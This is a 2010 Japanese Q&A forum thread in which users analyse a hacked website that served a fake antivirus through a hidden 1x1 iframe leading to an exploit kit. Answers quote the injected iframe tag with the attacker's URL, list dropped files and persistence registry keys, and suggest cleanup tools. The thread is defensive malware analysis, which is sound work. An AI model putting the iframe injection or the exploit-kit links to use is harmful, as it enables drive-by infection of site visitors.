回答受付中の質問
偽物ウイルス対策ソフト 配布サイトかもしれません。 **
偽物ウイルス対策ソフト
配布サイトかもしれません。
**
●ttp://gw.aguse.jp/?aguse_url=http%3A%2F%2Fwww.prime-k9.com%2Ftoiawase%2Findex.html&aguse_min_width=1002&aguse_with_form=aguse_with_form
******
↑
ここから、ソースコードをdownloadできます。しかし、avast!の場合には、そのソースコードをdownloadする段階でweb shieldが作動して、アクセスもできない状態となります。
**********
ht●p://w●w.prime-k9.com
多分、汚染しているはず。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1452247929
ellisa_drops_2010さんが「ハッケン報告」の大手柄。
感謝してます。
*********
では、質問でya♨巣。
みなさんのウイルス対策ソフトでは、検知できましたか?
脆弱性対策+PC仮想化された知恵袋さん、是非、報告を。
http://www.tohoho-web.com/html/iframe.htm
ショウヘイ氏の、ソースコード解説があれば、助かるのですが、、、、、。
-
- 質問日時:
- 2010/12/19 13:38:13
-
- 残り時間:
- 7日間
-
- 回答数:
- 8
-
- お礼:
- 知恵コイン
- 100枚
-
- 閲覧数:
- 103
-
- ソーシャルブックマークへ投稿:
- Yahoo!ブックマークへ投稿
- はてなブックマークへ投稿
- (ソーシャルブックマークとは)
回答
(8件中1〜8件)
- 並べ替え:回答日時の
- 新しい順
- |
- 古い順
皆さんお久しぶりです。
ちょっと出遅れましたね。
素晴らしい回答の数々に頭が下がります。
さて、今回もWebページ改竄によるiframe攻撃ですね。
<iframe width="1" height="1" src="攻撃リモートサーバ"></iframe>
現時点でアクセスしてみると、既に404で何も落ちてきませんでした。
回答を見ている限りでは、10月下旬あたりから出回っているJavaのOpenConnection系のExploitですかね。
JavaのSandboxをバイパスし、FakeAVを感染させるDownloader。
MPackの大流行を思い出しますね。
最近Adobe Reader XでSandboxが搭載されましたが、Javaのように数か月しないうちにExploitコードが公開されるでしょう。
それまでは、比較的安定した攻撃方法があるJavaが標的になりそうです。
http://java.sun.com/javase/ja/6/webnotes/ReleaseNotes.html
tida_realさんも仰るように、Exploit Kitが稼働しているサーバーへiframeを介してアクセスさせているんですね。
これも古くから使われている攻撃手法なのですが、ある意味iframeタグは最大の脆弱性ですよこりゃ。
同一サーバー以外のリソースをロードできない様にするとか、ブラウザ側での対応が望まれる部分です。
width="1" height="1"については、レイアウト上のスペーサや、アクセス解析に利用されているサイトも多いので、なんとも…。
何か良いアイデアを考えているところですが。
利用者側、ユーザーができる対策は難しいですねぇ。
このサイトの管理者はどう対応に出ることやら。
改竄されているということは、攻撃者が何らかの方法で既に改竄手段を得ている。
いつ再びExploit Kit稼働中のサーバーにすり替わるかわからないですね。
それに最近のFakeAVもポリモーフィックみたいな感じで、セキュリティ各社の対応が悪い気がします。
では、また何かあれば
- 違反報告
- 回答日時:2010/12/19 21:47:15
追記>
最高司令・・・了解しました。わたしも今夜中に消滅します。
ショウヘイさんが 一番上にいるのがいいよ。<追記終了
------------------------------------------
言い忘れた。
おい、一番↓にいる ”にゃ” とか ”きゃ”とか使ってるヤツ。
最高司令か?w
軍隊ゴッコもいいけどな。
そのフレーズの使用権をお前には与えていない。
こちらを撤回しろ。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1052244480...
オマエと同一人物と思われるのが不愉快だ。
yasuは ここでは関係ない。消えな。
- 違反報告
- 編集日時:2010/12/19 22:26:19
- 回答日時:2010/12/19 21:36:56
皆様 ご苦労様です。
感染手口は、1 x 1 dot iFrame ・先のマイクロアド感染と同じみたいですニャ。
currentversion7070さんの報告URLのソースを 今、見ましたら、
</STYLE>
</HEAD>
<BODY><iframe width="1" height="1" src="h tp://hage-yasu8x11.com/・・・
スタイルシート改ざんなんですかニャ?
この辺りの書式解説は御詳しい方にお任せするとして、
前回スレの、Antivirus Action 感染と同様手口なようですね。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1151567196
質問者がサジ投げ・シカト君なんで、わたしも投稿撤回しましたけどw
リンク内にあるsmilebananaさんのリンクが、
currentversion7070さんが特攻されたのと極似していますね。
exploit kitによる埋め込みは、
攻撃対象のPCをスキャンして、見合った脆弱性を突いてくるので、
どう爆弾投下されたか確信は持てないけど、前回の
Antivirus Action被感染者、
smilebanana.comさん、
currentversion7070さん
のデータから、
%UserProfile%\file.exe
%Temp%\ランダム英(数)字名フォルダ\ランダム英(数)字名.exe
%AppData%\syssvc.exe
レジストリ関連は、smillebananaさんから引用させて頂くと、
HKEY_CURRENT_USER\Software\ere94fe5o32
HKEY_CURRENT_USER\Software\ere94fe5o32 knkd dword:00000001
HKEY_CURRENT_USER\Software\ere94fe5o32 id "84.2"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run gqjqhdim "C:\DOCUME~1\user\LOCALS~1\Temp\eupfcqdha\dsxbnnutsbl.exe"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings ProxyEnable dword:00000000 dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServer "http=127.0.0.1:23012"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings ProxyOverride "<local>"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations LowRiskFileTypes ".exe"
・・・・・の確認・修復。
昨年のSecurity Tool感染からの教訓で、
%Temp%
%Windir%\Temp
インターネット一時ファイル:
XPの場合:
"%USERPROFILE%\Local Settings\Temporary Internet Files"
Vista/7の場合:
"%USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files"
上記3エントリーは、セーフモードで ATF-Cleanerで削除可。
システム復元機能の無効化を実行する。
全ファイル・フォルダを表示する設定にする。
カレントユーザーのスタートアップフォルダ内に
syszid32.exe のような実行ファイルがないか?セーフモードで確認・削除。
%Temp%内に生成された悪性エントリを削除しても復活する場合、
そこに再生成させる親玉を突き止める必要あり。
一例で、 *.bat、*.sys、レジストリエントリが Rootkitで隠蔽されていないか?
TDSSKiller、Sophos Anti-Rootkit の実行。
MBAM・SASの実行。
CurrPortsで悪性通信が無いか、数日最終確認。
ここで回答字数制限内で可能な、
簡易的駆除トライとして今思いつくのは、
わたしでは、これくらいしかありませんニャ。
回答者の皆さん。
もしエクスプロイト感染が蔓延して、
悪玉の素行・解析が煮詰まって来たら、
削除.batとか提供して下さいませ。真に期待してるニャ~~ん♡
しかし、やっぱ、感染したら”リカバリ”推奨がいいですかニャ・・・ばく。
PS:
ところで、肝心要でダンマリのハゲたヤスは、どうしたんでyasuキャ ?(8_8)?
- 違反報告
- 回答日時:2010/12/19 20:16:15
ひょこっとな・・・
早速突撃しましたよ。
(脆弱性の方はSecunia PSIで無いことを確認済み)
Chrome
接続遮断
#############
警告: このサイトにアクセスするとコンピュータに損害を与える可能性があります。
www.prime-k9.com のウェブサイトには、コンピュータに損害を与えたり無断で動作したりする不正なソフトウェアをホストしている可能性のあるサイト hegeam.com の要素が含まれています。不正なソフトウェアを含むサイトにアクセスするだけでコンピュータに感染する恐れがあります。
問題の詳細については、hegeam.com に関する Google セーフ ブラウジング診断ページをご覧ください。
オンラインの有害なソフトウェアから保護する方法についてはこちらをご覧ください。
#############
Firefox
無反応、怪しいファイル生成も無し
IE
dw20.exeを使用しようとしていることを確認。
Safari
無反応、怪しいファイル生成も無し
ではIEでdw20.exeを許可してみようと思いますので、しばしお待ちを・・・
結果報告
MSEが検出しましたね。
Exploit:Java/CVE-2010-0840.W
常駐きって再突撃!!(え)
↑さらに報告
IEでも無反応になりました・・・
調査続行不能・・・
- 違反報告
- 編集日時:2010/12/19 18:44:12
- 回答日時:2010/12/19 18:09:42
kaikaitarakoさん回答感謝
みなさん、感謝です。
CV専務、やっぱり、Antivirus Scanが飛び出してきましたね。
感染確定でya♨巣。
***********
http://www.virustotal.com/file-scan/report.html?id=8e56dbd512c0055c...
マイクロソフト社MSEでも、突撃しましたが、「全く検知できず」でya♨巣。
************
面白いことがあります。
XP(512MBの貧弱スペック)
adobe reader X
Flashは、最新
で、問題web siteに突撃したところ、
「Java Scriptが使用されております、xxxxxxxxxxxxxxxxxxxxxxx」という表示があり、
しばし、待機していると、
IEエクスプローラから
「Adobe PDF文書
Adobe AcrobatまたはReaderに問題があります。Acrobatまたは、Readerを実行している場合、終了してから、もう一度やり直してください(103:103)」という注意勧告が飛び出してきた!
*************
さて、ソースコードの一部
↓
</SCRIPT></HEAD>
<BODY><iframe width="1" height="1" src="h●tp://hegeam.c●m/gizmod/start.php?id=vlnd"></iframe>
<DIV align="center">
<TABLE width="780">
<TBODY>
************
hegeam.c●m(●は、oです。comの意味でya♨巣)
↑
この「ハゲ」なんとかcomにアクセスしたら、avast!のweb shieldが作動して「トロイの木馬」判定でya♨巣。
http://wam.dasient.com/wam/infection_library/3076d0efe3d74bcf4f74ae...
さらに、みなさん、調査お願いするで、ya♨巣
*********
おい!
ya♨巣
お前の出番だろう
同族の「ハゲcom」だってよ!
- 違反報告
- 編集日時:2010/12/19 16:16:17
- 回答日時:2010/12/19 16:01:26
皆さまご苦労さまです。
特攻すると、
www■prime-k9■com/flow/index■html
ここから感染しました。
はじめは、
Documents and Settings¥user¥
に『file.exe』がダウンロードされ、
Documents and Settings¥¥user¥Local Settings¥Temp¥
に『ランダム英字文字列フォルダ¥cavragmaffm.exe』が作成。
(ファイル名もランダム文字列?)
『file.exe』と『cavragmaffm.exe』は同じもの。
(XP環境)
まだ他に潜んでいるかは不明です。
http://www.virustotal.com/file-scan/report.html?id=6776fdca6cd26fe5...
http://www.virustotal.com/file-scan/report.html?id=6776fdca6cd26fe5...
- 違反報告
- 編集日時:2010/12/19 15:54:12
- 回答日時:2010/12/19 15:42:26
そのサイト、aguseでは異常なしと出てましたが、gredでは不正改ざんとの判定が出てました。
(ノートンセーフウェブの方は、まだ調査していないとのこと)
ちなみに、Aviraのフリー版を入れているPCでソースコードをdownloadしようとしたら、マルウェアを検出、ガードされてしまいました。
- 違反報告
- 編集日時:2010/12/19 14:40:38
- 回答日時:2010/12/19 14:27:18
cara_tiba_manko2さん
***********
貴重な報告に感謝します。
う~ん、GIGAZINEの再来ですか、、、、、、。
このかん、「年末の大爆発があるかも」と警告してきましたが、
遂に、、、、ですかね?
GIGAと同じような感染の特徴があるということは、
感染は「爆発=パンデミック」かも知れませんよ。
**
是非、そのときは、「陣頭指揮」をお願いしますね。
幸い、実行exeがtempに作成された場合に限って、ATFcleaner+セーフモード下の環境で、PCの制圧から脱出できることが確認できているので、その型のmalwareであれば、こっちも「楽チン」できるのですけどもね。
ほんと、陣頭指揮お願いしますよ。
*****
それにしても「祖チン」のya☣巣➑➑➑➑➑➑➑➑➑➑➑って、
ここぞというときに「姿」を消すと思いませんか?
毛根は、とっくに「消えて」ますけど、、、、、、。
- 違反報告
- 回答日時:2010/12/19 14:17:42